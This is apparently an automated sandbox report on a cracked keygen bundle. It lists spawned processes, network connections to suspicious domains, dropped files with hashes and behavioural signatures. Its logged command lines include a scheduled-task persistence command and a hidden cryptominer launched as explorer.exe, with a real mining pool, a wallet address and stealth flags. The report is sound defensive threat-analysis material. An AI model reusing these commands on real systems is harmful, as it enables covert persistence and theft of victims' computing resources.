C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 352
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4388 -ip 4388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1192
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| US | 8.8.8.8:53 | startupmart.bar | udp |
| US | 8.8.8.8:53 | best-supply-link.xyz | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| RU | 186.2.171.3:80 | 186.2.171.3 | tcp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| RU | 186.2.171.3:443 | 186.2.171.3 | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.9.200.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.171.2.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.79.21.104.in-addr.arpa | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | cleaner-partners.biz | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | gensolutions.bar | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| SG | 37.0.10.214:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| SG | 37.0.10.244:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| UA | 194.145.227.161:80 | tcp | |
| PL | 51.68.137.186:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 141.94.23.83:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 186.137.68.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.23.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| MX | 31.210.20.251:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
Files
memory/1856-0-0x0000000000F50000-0x0000000001035000-memory.dmp
memory/3668-7-0x00000000012C0000-0x00000000012D8000-memory.dmp
memory/1948-17-0x0000000000400000-0x00000000004E5000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
memory/4840-39-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
| MD5 | 51ef03c9257f2dd9b93bfdd74e96c017 |
| SHA1 | 3baa7bee4b4b7d3ace13409d69dc7bcd0399ac34 |
| SHA256 | 82a022b29bda763ef9f2ce01c82c82e199182d1d0243cca9811eccc1d993cecf |
| SHA512 | 2c97e5d08c9be89ca45153511e0976abfabf41e25d4187dcb7586ba125b6d8d763b99e79043ac1504203c26c7ab47a9246d9a0235b469f6c611703d4e2ae00e1 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
| MD5 | 7126148bfe5ca4bf7e098d794122a9a3 |
| SHA1 | 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64 |
| SHA256 | f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5 |
| SHA512 | 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\JOzWR.dat
| MD5 | 12476321a502e943933e60cfb4429970 |
| SHA1 | c71d293b84d03153a1bd13c560fca0f8857a95a7 |
| SHA256 | 14a0fbd7eab461e49ee161ac3bd9ad8055086dbe56848dbaba9ec2034b3dea29 |
| SHA512 | f222de8febc705146394fd389e6cece95b077a0629e18eab91c49b139bf5b686435e28a6ada4a0dbb951fd24ec3db692e7a5584d57ffd0e851739e595f2bbfdc |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
| MD5 | 8902f8193024fa4187ca1aad97675960 |
| SHA1 | 37a4840c9657205544790c437698b54ca33bfd9d |
| SHA256 | 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f |
| SHA512 | c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938 |
memory/3012-78-0x0000000000D20000-0x0000000000EF6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
| MD5 | 4b0d49f7c8712d7a0d44306309f2e962 |
| SHA1 | 5f0a2536f215babccf860c7ccdeaf7055bb59cad |
| SHA256 | f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60 |
| SHA512 | 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b |
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
| MD5 | 13e802bd360e44591d7d23036ce1fd33 |
| SHA1 | 091a58503734848a4716382862526859299ef345 |
| SHA256 | e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b |
| SHA512 | 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b |
memory/3744-98-0x00000000004E0000-0x00000000004F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2.exe
| MD5 | a5bace3c3c2fa1cb766775746a046594 |
| SHA1 | 9998cad5ba39e0be94347fcd2a2affd0c0a25930 |
| SHA256 | 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6 |
| SHA512 | 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184 |
memory/5020-113-0x0000000000550000-0x0000000000570000-memory.dmp
memory/3124-114-0x00000000000C0000-0x00000000000C8000-memory.dmp
memory/5020-119-0x0000000000E30000-0x0000000000E4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 0ebb4afbb726f3ca17896a0274b78290 |
| SHA1 | b543a593cfa0cc84b6af0457ccdc27c1b42ea622 |
| SHA256 | 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2 |
| SHA512 | 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11 |
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
| MD5 | f250a9c692088cce4253332a205b1649 |
| SHA1 | 109c79124ce2bda06cab50ea5d97294d13d42b20 |
| SHA256 | 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882 |
| SHA512 | 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e |
memory/4920-144-0x0000000000400000-0x0000000000667000-memory.dmp
memory/4920-150-0x0000000000400000-0x0000000000667000-memory.dmp
memory/4388-149-0x0000000000400000-0x0000000002B59000-memory.dmp
memory/3744-156-0x0000000003010000-0x0000000003022000-memory.dmp
memory/3744-155-0x00000000015C0000-0x00000000015CE000-memory.dmp
memory/4920-159-0x0000000003960000-0x0000000003970000-memory.dmp
memory/4920-165-0x0000000003AC0000-0x0000000003AD0000-memory.dmp
memory/4920-172-0x0000000004570000-0x0000000004578000-memory.dmp
memory/4920-173-0x0000000004590000-0x0000000004598000-memory.dmp
memory/4920-175-0x0000000004630000-0x0000000004638000-memory.dmp
memory/4920-178-0x0000000004780000-0x0000000004788000-memory.dmp
memory/4920-179-0x00000000047A0000-0x00000000047A8000-memory.dmp
memory/4920-180-0x0000000004A40000-0x0000000004A48000-memory.dmp
memory/4920-181-0x0000000004940000-0x0000000004948000-memory.dmp
memory/4920-182-0x00000000047B0000-0x00000000047B8000-memory.dmp
memory/4920-195-0x0000000004590000-0x0000000004598000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 88d88711598409c91cb0bf7a163ac6ba |
| SHA1 | 9ec2e16eb9e63b3489cef82dde59cd96af9a79ee |
| SHA256 | 2da7cbc011b75277e017a54f9092ad9984aa9d8e5dab82122ce08b98b9bd76b1 |
| SHA512 | 74ea46be227a919b208ab9b06f851b0076510ccba3b6032534d742702c85ad61843bef7e1add37b47026bc9f8f5f1996922339fc38c212220ea6f872756c7a06 |
memory/4920-203-0x00000000047B0000-0x00000000047B8000-memory.dmp
memory/4920-205-0x00000000048E0000-0x00000000048E8000-memory.dmp
memory/4920-218-0x0000000004590000-0x0000000004598000-memory.dmp
memory/4920-226-0x00000000048E0000-0x00000000048E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 5d9270ca7f3d21d2c85271e25df5b750 |
| SHA1 | c324dbe597897807248d70eb5c2ff3ae88101f8b |
| SHA256 | 267b645fc4f9eeade4f0eabd14b52f87d07fed7858e9126a761555a153b8045f |
| SHA512 | bc86894fdf0d24fde10c5589ddfe2fb4852684cc28d4d0eef37ea6a4e5d4dd48f46b978953a42eff8f4dac64e5993ebf50808913ead77084194491d0e068b133 |
memory/4920-228-0x00000000047B0000-0x00000000047B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 9f139deb18340bcc42cf9a9f150aafe6 |
| SHA1 | 42b7d6d812376bb1515b042e353ebfe913aad0ec |
| SHA256 | 5c8808081c52a62c2a61ca28407b4561c5f0f8c65efea54d057f60d0cdd331f7 |
| SHA512 | e71f672fa664c356068cba895d345ae6062fefca00d5b8fd1c527df2af2b0909b43b071b63a8966e0525dae7c7f1ccd889809e93cd10180bc0ba35e0de14fbb1 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d
| MD5 | f648d6275daa9e8931d9f308effb2e54 |
| SHA1 | c70e546ed9748f2e82411bf74f26913165568e68 |
| SHA256 | 1c97e0f7c63973051f4789977ff99a48e57a7d652ecdd13e2baa23e574da03c2 |
| SHA512 | 6a01951cb168960cc703fb3d9ef30d41d2a8b551cb6d73700654b8c4ca91ad477b1eabe85b3563f8ea3400c9107b2bfa3302334471db6f2a52f0e4848a1de597 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 8a2643f4b45c073f6cf736c7cffdb804 |
| SHA1 | 2acb9d845b2d6727b586e312b1760e092eaef4f0 |
| SHA256 | 98105eeeff066d4588ae7025b580e927ae567ccef7362fd3a37b2698c4862943 |
| SHA512 | f4b57c399bf85c0c47f7789f071d1a6402d641ba930ebf4c5cd3e4f06d6a6f0f04ce5ae335454c495f229eec41a9b4aba50dcda973c0e2350cfa37ab5a1e8c97 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | cc3ecd660174673340e9caab0b926f80 |
| SHA1 | a676a5774d17aa695d3ab63f8954fd55dfa3a587 |
| SHA256 | c1d5d14141e0fa66c604ccfd06d23caf02e2076ff74f69aca018da32d31ef638 |
| SHA512 | 3afb8e8f8fa5f30b9037e44dcac6736e0bbf707725599fcf4e73ee36fc72f9b1e8f383df0152ebe2bfb029bfa46437aba05151035ad8230396495c383323a351 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 544016fa16b1eeddc26762dab9e42b8d |
| SHA1 | d78b947cc7414bf1360682714502ddd0c5636b3f |
| SHA256 | 8a244b95cf1989a024507e57d9c2499c118e2f3bf0ee9e6af5755c84db0101f9 |
| SHA512 | 176f01e1b66f2eae5bd55775ed5fc2c5dbccba747bf1950221a48a74b57176d293e6d80b65235a932a090928f6ea4a4be3b116b48ba8414974b458791384e51c |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | fc585a35047da6dbbb3d70d5baaabe73 |
| SHA1 | bbb25a1da44cddcf636e7aa787c8aff97fed3497 |
| SHA256 | 1161eccf59ac9815f8a7624d308fb56018c79344a39affec419691a2cf16bcaa |
| SHA512 | 18b125c21796ebf29eb422dd720488830918b3ef56db9bf8a7a6b348d1d43e717644eaebac6e8698cd6041d051834e414504fe62ae60e167a9207af73622271d |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 7fa2720a93d7206a3cdba2d8f87e1346 |
| SHA1 | 99ba4629bab4fa0069846285950e87d0c482e77b |
| SHA256 | 91cf845a05348020c8b459d8ac7c4d01d920441d35843642a9668230c4bc4f4e |
| SHA512 | a8d8292399e2f72286576ab6c9e9aa592d7bc5c8f9929a340d3cf2b3451b68738492eeafb59012da38000b3ba2f97d1aba59d716b39b33b7dee2716bb4e51a55 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 8f8ef5e71647faa15122f7696013191d |
| SHA1 | 82d490b760bbfa59d4082bb4ddeb2f8dd8272723 |
| SHA256 | 206083cc3bb446324b5374218e933f9465d674b4c4b561f40da950a7060374eb |
| SHA512 | 65256670022351f9d1a9ae31eb98cf2a3908ae3e486e10e9cb71897b9fc38e7fbfc6a07635231ada87361aa422d7401cbbecb5694eacf7d44ddbc23309c3c567 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 7109832a59d317e32758ee931a784b70 |
| SHA1 | 3d458effa91b3b4f9b5233cb68a1a6e1eafbce63 |
| SHA256 | 1f2974df584934022f4b9ebbd58dcc793d54cd828ee3be400716ae1ebc10cf75 |
| SHA512 | 4724239c27a7251255ff919c1f26aed49549540e6d14d50adbbb71a90e3ed9770d8e9665e8cc94af18483d660a492445d1c3ee03f71345ae7eb6ec825517009d |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 43370346acc17e84410028e700fed4e9 |
| SHA1 | 5cbd1631245ce68521dbbec2d6b27760f17f49f0 |
| SHA256 | 8e9b531e1cd47907657b52fcc0bde284ef210528258aa5dcc6c7d0ec1e76e701 |
| SHA512 | 862b93c5da790fc02f556262e053c77bc747fb65965caf38e195cd44e034e5673df5becdedd0a9a858b2d8df105c66263da1755263b6b9aa7deefb0de530c420 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | d628ec48b246719f0b5e6abc9bd04d95 |
| SHA1 | 096c1700bfdee5710d6b6d96db0e6ca70b9e13bc |
| SHA256 | af63b35f8319a61ac7f0918b2170352eb0cbe5e920880f2d3613d59eba2f46c1 |
| SHA512 | 80b5fb1970264c9cce164a59b9ca8fbeb7efcd2a46463157e2ceb46b501a628c1251cafaf06f2d28ebdd2bb1cfc4370c8bc351aeba8a216d56e889a17aa8f528 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 6d4da37038e0d3edad83cabee3a2e0e6 |
| SHA1 | 63fb66513adb115ed7c741b505cd3fafecc7f423 |
| SHA256 | ec8153a8cd4172bef8240c8bcb9402416442a77585e8c4552ee0a93b6b7266bb |
| SHA512 | 0872e398b381803feaf8f07a702391dc13a43af4ba7278bef1e5638f588f3cf8448c68d3cf2fa46276ecc86a94505443d1137eeb4bdc2334b8744389dff80159 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.INTEG.RAW
| MD5 | be1369965ea491a565233a8c107517ac |
| SHA1 | 30491598ca4a6658a80c5747b309375e442b8ce3 |
| SHA256 | 0a52209b70d488721639a45e9997068e4cac3eaf6a4b8316d870e4a7b11285e5 |
| SHA512 | 12c2e58a81908f14a94bbed1c8199e2a580bfef2df88f9b2f76ad09620fa376248b891cd7e92a8ba1d7da4bbe5d932842b503ef900b4ac7e8eb16e1a3a93794c |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 62bbf676f601e84937ab8ab66c6a6ed2 |
| SHA1 | b00bca87d930dc66a98ce8840a52e3c249e988d3 |
| SHA256 | 069644a1fa72039671e938fea2ec756587bdfd154873402a7e2afc271799d56f |
| SHA512 | a25687b67444dfdf54016151111172568aeaf7ecc7feb767bf4085b2d0b0b9c0661a3f5b25089fa0f62d53c7e7e65591715380ccf2162307445aadc22f0327b8 |
memory/4920-669-0x0000000000400000-0x0000000000667000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
| MD5 | 0388a1ce1bb8c076387b69ffcb3b40ec |
| SHA1 | 3ec08a53ec024d9be6346440848c37d0e0d7bb80 |
| SHA256 | 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a |
| SHA512 | ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
| MD5 | 9a6071c1a67be3fb247f857fe5903bbf |
| SHA1 | 4a2e14763c51537e8695014007eceaf391a3f600 |
| SHA256 | 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c |
| SHA512 | c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68 |
memory/1156-689-0x0000000000020000-0x000000000003E000-memory.dmp
memory/1156-690-0x00000000006D0000-0x00000000006EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
| MD5 | 7009fb80a52366b6c2cd8ec052a65791 |
| SHA1 | db0894463edf3ac11e5ca4b4584e8f10d75810f6 |
| SHA256 | 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255 |
| SHA512 | 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079 |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 9910203407b2605107587e954081c575 |
| SHA1 | 8037bfb3b779fbbb3273df4f5c63d15b9589ce95 |
| SHA256 | 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49 |
| SHA512 | ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be |
memory/4312-719-0x0000000000D30000-0x0000000000D36000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win7-20240903-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
150s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
